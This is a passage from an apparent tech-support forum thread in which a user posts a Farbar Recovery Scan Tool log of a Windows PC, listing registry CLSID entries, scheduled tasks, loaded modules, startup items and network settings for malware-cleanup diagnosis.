    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{9906CDFC-DB2C-4126-9422-13139B148495}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{9A21C6C5-27FC-4442-8590-575E7AFD73BB}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{9ECF83FB-23C5-43B6-83DE-93CFBDD74D4A}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{A58F47CC-FF65-4152-B0B1-666C643A5BFC}\InprocServer32 -> AcETransmit.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{A6A3D586-44CF-44C2-A92C-620BB713B4F2}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{ABBE3F83-D585-4A50-9B69-198B0F566F2E}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{AC5CECFA-F03A-41D2-A89C-704C44935941}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{B1560245-190E-4BBD-81DF-9B642D0E5325}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{B2A579E0-A797-40B1-8AEE-A8F6404719F8}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{B47196BC-D4AB-41BB-A771-543D67CFC9F5}\InprocServer32 -> AcETransmit.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{B53CEF4B-1A13-49DE-BBC5-A7100FB2F38C}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{B5EE2B68-9A23-4BCD-BB77-FEA6DFB24DD6}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{B6B5DC40-96E3-11d2-B774-0060B0F159EF}\localserver32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\Inventor.exe (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{B80687F9-FA4C-4735-9DC4-E5715F2BC698}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{B8E7214B-25CA-4116-84CB-E86FB9625B36}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\ServiceModule.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{BAE5802A-CF21-4F9C-AE04-D98F4036AC31}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{BBF6A206-CB04-479D-96AE-349E1E83319A}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{BBF9FDF1-52DC-11D0-8C04-0800090BE8EC}\localserver32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\Inventor.exe (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{BC71DEA1-D6FB-48B8-AB06-D151C81BBCDD}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{BE54741D-E02B-4572-93D6-105AF4EDE777}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\ServiceModule.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{BF224DC3-B602-4EEE-BFE9-9E4E0AED6837}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{BF4CC07E-E9BB-40D6-873F-855B211033B9}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{C061C82C-D041-4214-BB07-B608107CEFCB}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{C2D4ACCC-A3D1-4A0A-AD59-0DD8BA3D5EE1}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{C343ED84-A129-11d3-B799-0060B0F159EF}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\RxApprenticeServer.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{C8C18F89-794D-466B-8B97-95634D9890EF}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{C8EC7647-1E79-4F13-81D7-2EED803D0D22}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{C92F8F8C-8B2C-11d4-B872-0060B0EC020B}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\DtBridge.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{CC23CA32-9892-4FBA-A108-FE31CA0F35A6}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{CD865713-70D6-4E15-BB7B-9B99AD9DEB85}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{CFEE2BAF-14F9-4D23-853D-B6E2BCC14263}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\ServiceModule.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{D56F5AB3-9C4D-4F1A-A851-A671D9FE8C22}\InprocServer32 -> AcETransmit.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{D66873EA-AAE5-41CC-8DD2-8CE3228E9F89}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{D7A1987D-4A73-11D1-9A4B-080009DCE505}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\ColorButton.Ocx (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{D7A1987E-4A73-11D1-9A4B-080009DCE505}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\ColorButton.Ocx (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{D86B6C47-11F2-4D95-B635-EA575F0892FC}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{DA1F437C-9BD9-11d4-B87C-0060B0EC020B}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\DtBridge.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{DB207560-8449-4FAF-BDC2-61676EB012D4}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{DB5D476B-3FF4-4E9D-A606-1E2B473BE571}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\AcInetUI.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{DCA7356C-FF94-4b20-AE04-7AA6A8E14117}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\ServiceModule.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{DDA9A20F-5B56-49F5-9465-CE82FC199352}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\ServiceModule.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{DE6B563C-B074-4BF1-A8A0-B3FED8703E99}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\ServiceModule.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{DE74F5AD-DA2F-429F-BAF9-850A2808D585}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{DF6525C2-6358-4B07-813D-708120C5FE1A}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{E177A457-9EAA-43C3-A3CE-84874A28F6CA}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{E1C85E9F-60B2-4007-80C3-2C5E09474C3B}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\RxInventorUtilities.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{E29F6C45-6927-4508-8F3F-34105FD3FC5F}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{E4222C78-3670-4BB1-9AD4-7D8F3E581F2D}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{E5B0515D-48D2-4F04-906D-0192ED65A2DD}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\TestServer.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{E60F81E1-49B3-11D0-93C3-7E0706000000}\localserver32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\Inventor.exe (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{E70DE962-842A-4488-9481-1D0FD72A020F}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{E9C07CEC-7B82-49E4-BBA2-7533B88E9D64}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{EA34A0C0-5CE7-4701-A6FA-117D25CD5EBB}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{EF01D98A-747B-4522-AD70-991B90855DBF}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{F13E75B9-6AF6-49CB-80B3-6D2FF6E09932}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\ServiceModule.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{F196F03F-651A-43AF-BE34-D11942F24445}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{F2D4F4E5-EEA1-46FF-A83B-A270C92DAE4B}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\DTInterop.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{F2DB0EE3-7137-4CB0-8349-483C4FF2143A}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{F40E2FF0-4D77-40B2-9A44-A3AEECCE8EFF}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{F5522F0C-962A-48AC-9992-E81B07628F1F}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{F61064CC-DBFB-47ee-9BC8-CA5A1CBDF0DA}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\InvResc.dll (Autodesk)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{F78DCF7C-043D-45FC-9D21-676FC307BA3F}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{F868EAEC-1B73-4F5E-BA73-90EBA94E75BE}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{FA62F626-EBD5-4dc5-B970-D9E81E0E20E0}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\ServiceModule.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{FA97F7A7-FD19-4D55-ABF2-CFEFFF777426}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{FB469644-3F14-4403-ACCA-6B13486FF7BD}\localserver32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\InvTXTStack.exe (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{FD51ED8A-D518-4554-B236-B6E9D234FD03}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{FD703B01-4362-423E-9BDB-91BDCB16C1C9}\InprocServer32 -> C:\Program Files\Autodesk\Inventor 2015\Bin\DTInterop.dll (Autodesk, Inc.)
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{FE054BB2-AF94-40AC-88AA-2F59F7018B1D}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{FE317223-8EDE-4684-B424-E48B9EA90220}\InprocServer32 -> axdb.dll => No File
    CustomCLSID: HKU\S-1-5-21-3006523739-2206101463-1198655294-1000_Classes\CLSID\{FE718E8F-C3AA-4F30-9103-432450CF1DA1}\InprocServer32 -> axdb.dll => No File

    ==================== Scheduled Tasks (Whitelisted) =============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    Task: {0B574DF1-B938-44EC-809D-DC10D6D1506D} - System32\Tasks\{8EFAA458-F192-4393-9B47-876FBFD29F95} => pcalua.exe -a "E:\SW\PTC Creo 2.0 F000 Win32 + Win64 Multilanguage with crack + HelpCenter\PTC_Creo_2.0_F000_HelpCenter_Multilanguage\setup.exe" -d "E:\SW\PTC Creo 2.0 F000 Win32 + Win64 Multilanguage with crack + HelpCenter\PTC_Creo_2.0_F000_HelpCenter_Multilanguage"
    Task: {6563C209-7317-40AB-B1C0-72BF3B519D30} - System32\Tasks\{F21BBE26-5173-4D1B-A4D7-289191AC4336} => pcalua.exe -a "E:\SW\PTC Creo 2.0 F000 Win32 + Win64 Multilanguage with crack + HelpCenter\PTC_Creo_2.0_F000_Multilanguage\setup.exe" -d "E:\SW\PTC Creo 2.0 F000 Win32 + Win64 Multilanguage with crack + HelpCenter\PTC_Creo_2.0_F000_Multilanguage"
    Task: {6D8762C9-BBB2-40BD-AD90-5DB14306F38E} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-05] (Google Inc.)
    Task: {D1348DE2-EE47-4671-8CE6-AB2CF613F69B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-05] (Google Inc.)
    Task: {DABBA7EF-6EB1-4BC5-A420-E50B3170F6A6} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2015-09-05] ()
    Task: {DB79B6E5-01FF-496F-8549-4B900B3720A1} - System32\Tasks\{A0F80D69-4945-4230-AF59-AE70922D543C} => C:\Program Files (x86)\Panda Security\Panda Cloud Antivirus\JobLauncher.exe [2014-05-02] (Panda Security, S.L.)
    Task: {E52FEEBB-8FF3-492B-8B43-951ECCED89CF} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-07-18] (Piriform Ltd)
    Task: {E7676096-C1A0-4F22-8EB0-E9D31F1E69F7} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-10-16] (Adobe Systems Incorporated)

    (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

    Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
    Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
    Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
    Task: C:\Windows\Tasks\{A0F80D69-4945-4230-AF59-AE70922D543C}.job => C:\Program Files (x86)\Panda Security\Panda Cloud Antivirus\JobLauncher.exe
     
  5. blackclaw96

    blackclaw96 TS Rookie Topic Starter

    ==================== Shortcuts =============================

    (The entries could be listed to be restored or removed.)

    ==================== Loaded Modules (Whitelisted) ==============

    2014-11-18 08:29 - 2014-11-18 08:29 - 00047464 _____ () C:\Program Files (x86)\Wi-Fi\WiFiGxSvc.exe
    2015-09-07 19:24 - 2012-08-08 21:36 - 00390672 _____ () C:\Program Files\CyberLink\Shared files\RichVideo64.exe
    2010-01-30 02:40 - 2010-01-30 02:40 - 04254560 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
    2010-03-24 21:38 - 2010-03-24 21:38 - 08794976 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
    2015-09-05 21:06 - 2011-10-26 17:41 - 00318976 _____ () C:\Program Files\TeraCopy\TeraCopyExt64.dll
    2014-06-01 15:48 - 2014-06-01 15:48 - 01396736 _____ () C:\Program Files (x86)\Codebox\BitMeter\BitMeter2.exe
    2016-01-31 20:59 - 2013-12-22 11:52 - 00047496 _____ () C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\QtSolutions_Service-head.dll
    2016-01-31 20:59 - 2013-12-22 11:52 - 00104328 _____ () C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\qjson0.dll
    2013-04-21 21:44 - 2013-04-21 21:44 - 00087952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
    2013-04-21 21:44 - 2013-04-21 21:44 - 01242952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
    2013-04-12 22:53 - 2013-04-12 22:53 - 00612664 _____ () C:\Program Files (x86)\Panda Security\Panda Cloud Antivirus\SQLite3.dll
    2010-01-30 02:41 - 2010-01-30 02:41 - 04254560 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
    2010-03-24 21:17 - 2010-03-24 21:17 - 08794464 _____ () C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll
    2015-09-05 19:01 - 2013-09-16 12:17 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll
    2014-12-01 14:17 - 2014-12-01 14:17 - 00044560 _____ () C:\Program Files (x86)\Wi-Fi\plugins\txn.controller_0.1.0.dll
    2014-11-20 12:07 - 2014-11-20 12:07 - 00367632 _____ () C:\Program Files (x86)\Wi-Fi\CTKPluginFramework.dll
    2014-11-20 12:07 - 2014-11-20 12:07 - 00144400 _____ () C:\Program Files (x86)\Wi-Fi\libqjson.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00417280 _____ () C:\Program Files (x86)\Winamp\nsutil.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00078848 _____ () C:\Program Files (x86)\Winamp\nde.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00023040 _____ () C:\Program Files (x86)\Winamp\System\albumart.w5s
    2011-12-09 22:53 - 2015-09-07 18:43 - 00019456 _____ () C:\Program Files (x86)\Winamp\System\bmp.w5s
    2011-12-09 22:53 - 2015-09-07 18:43 - 00047616 _____ () C:\Program Files (x86)\Winamp\zlib.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00016896 _____ () C:\Program Files (x86)\Winamp\System\dlmgr.w5s
    2011-12-09 22:53 - 2015-09-07 18:43 - 00014336 _____ () C:\Program Files (x86)\Winamp\System\filereader.w5s
    2011-12-09 22:53 - 2015-09-07 18:43 - 00019456 _____ () C:\Program Files (x86)\Winamp\System\gif.w5s
    2011-12-09 22:53 - 2015-09-07 18:43 - 00016384 _____ () C:\Program Files (x86)\Winamp\System\gracenote.w5s
    2011-12-09 22:53 - 2015-09-07 18:43 - 00623616 _____ () C:\Program Files (x86)\Winamp\System\jnetlib.w5s
    2011-12-09 22:53 - 2015-09-07 18:43 - 00154624 _____ () C:\Program Files (x86)\Winamp\System\jpeg.w5s
    2011-12-09 22:53 - 2015-09-07 18:43 - 00084480 _____ () C:\Program Files (x86)\Winamp\System\playlist.w5s
    2011-12-09 22:53 - 2015-09-07 18:43 - 00103936 _____ () C:\Program Files (x86)\Winamp\System\png.w5s
    2011-12-09 22:53 - 2015-09-07 18:43 - 00013824 _____ () C:\Program Files (x86)\Winamp\System\primo.w5s
    2011-12-09 22:53 - 2015-09-07 18:43 - 00021504 _____ () C:\Program Files (x86)\Winamp\System\tagz.w5s
    2011-12-09 22:53 - 2015-09-07 18:43 - 00035328 _____ () C:\Program Files (x86)\Winamp\System\timer.w5s
    2011-12-09 22:53 - 2015-09-07 18:43 - 00090112 _____ () C:\Program Files (x86)\Winamp\System\xml.w5s
    2011-12-09 22:53 - 2015-09-07 18:43 - 00068608 _____ () C:\Program Files (x86)\Winamp\Plugins\in_avi.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00102400 _____ () C:\Program Files (x86)\Winamp\Plugins\in_cdda.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00072192 _____ () C:\Program Files (x86)\Winamp\Plugins\in_dshow.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00061440 _____ () C:\Program Files (x86)\Winamp\Plugins\in_flac.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00043008 _____ () C:\Program Files (x86)\Winamp\Plugins\in_flv.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00007168 _____ () C:\Program Files (x86)\Winamp\Plugins\in_linein.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00109568 _____ () C:\Program Files (x86)\Winamp\Plugins\in_midi.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00049152 _____ () C:\Program Files (x86)\Winamp\Plugins\in_mkv.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00165376 _____ () C:\Program Files (x86)\Winamp\Plugins\in_mod.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00290304 _____ () C:\Program Files (x86)\Winamp\Plugins\in_mp3.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00052736 _____ () C:\Program Files (x86)\Winamp\Plugins\in_mp4.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00075264 _____ () C:\Program Files (x86)\Winamp\Plugins\in_nsv.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00023552 _____ () C:\Program Files (x86)\Winamp\Plugins\in_swf.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00253440 _____ () C:\Program Files (x86)\Winamp\Plugins\in_vorbis.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00016896 _____ () C:\Program Files (x86)\Winamp\Plugins\in_wave.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00253440 _____ () C:\Program Files (x86)\Winamp\libsndfile.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00313344 _____ () C:\Program Files (x86)\Winamp\Plugins\in_wm.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00022528 _____ () C:\Program Files (x86)\Winamp\Plugins\out_disk.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00052224 _____ () C:\Program Files (x86)\Winamp\Plugins\out_ds.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00018432 _____ () C:\Program Files (x86)\Winamp\Plugins\out_wave.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 01737728 _____ () C:\Program Files (x86)\Winamp\Plugins\gen_ff.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00083968 _____ () C:\Program Files (x86)\Winamp\tataki.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00340992 _____ () C:\Program Files (x86)\Winamp\Plugins\freeform\wacs\freetype\freetype.wac
    2011-12-09 22:53 - 2015-09-07 18:43 - 00027648 _____ () C:\Program Files (x86)\Winamp\Plugins\gen_hotkeys.dll
    2011-11-11 03:40 - 2015-09-07 18:43 - 00185344 _____ () C:\Program Files (x86)\Winamp\Plugins\gen_jumpex.dll
    2011-12-09 22:53 - 2015-09-07 18:43 - 00025600 _____ () C:\Program Files (x86)\Winamp\Plugins\gen_tray.dll
    2015-09-22 11:31 - 2016-02-14 00:12 - 08772096 _____ () C:\Program Files (x86)\AirDroid\Android.dll
    2014-03-19 18:48 - 2016-02-14 00:12 - 00630784 _____ () C:\Program Files (x86)\AirDroid\System.Data.SQLite.dll
    2016-02-20 16:37 - 2016-02-18 09:44 - 01630360 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\libglesv2.dll
    2016-02-20 16:37 - 2016-02-18 09:44 - 00085656 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\libegl.dll
    2016-03-10 11:17 - 2016-03-08 12:16 - 17541312 _____ () C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\PepperFlash\21.0.0.182\pepflashplayer.dll

    ==================== Alternate Data Streams (Whitelisted) =========

    (If an entry is included in the fixlist, only the ADS will be removed.)


    ==================== Safe Mode (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\NanoServiceMain => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PSUAService => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NanoServiceMain => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PSUAService => ""="Service"

    ==================== EXE Association (Whitelisted) ===============

    (If an entry is included in the fixlist, the registry item will be restored to default or removed.)


    ==================== Internet Explorer trusted/restricted ===============

    (If an entry is included in the fixlist, it will be removed from the registry.)


    ==================== Hosts content: ===============================

    (If needed Hosts: directive could be included in the fixlist to reset Hosts.)

    2009-07-14 08:04 - 2009-06-11 02:30 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts


    ==================== Other Areas ============================

    (Currently there is no automatic fix for this section.)

    HKU\S-1-5-21-3006523739-2206101463-1198655294-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\WELCOME\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
    DNS Servers: 113.193.12.14 - 113.193.1.14
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
    Windows Firewall is enabled.

    ==================== MSCONFIG/TASK MANAGER disabled items ==

    (Currently there is no automatic fix for this section.)

    MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^CheVolume.lnk => C:\Windows\pss\CheVolume.lnk.CommonStartup
    MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^TP-LINK Wireless Configuration Utility.lnk => C:\Windows\pss\TP-LINK Wireless Configuration Utility.lnk.CommonStartup
    MSCONFIG\startupfolder: C:^Users^WELCOME^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Rainmeter.lnk => C:\Windows\pss\Rainmeter.lnk.Startup
    MSCONFIG\startupreg: AdobeAAMUpdater-1.0 => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
    MSCONFIG\startupreg: AdobeBridge =>
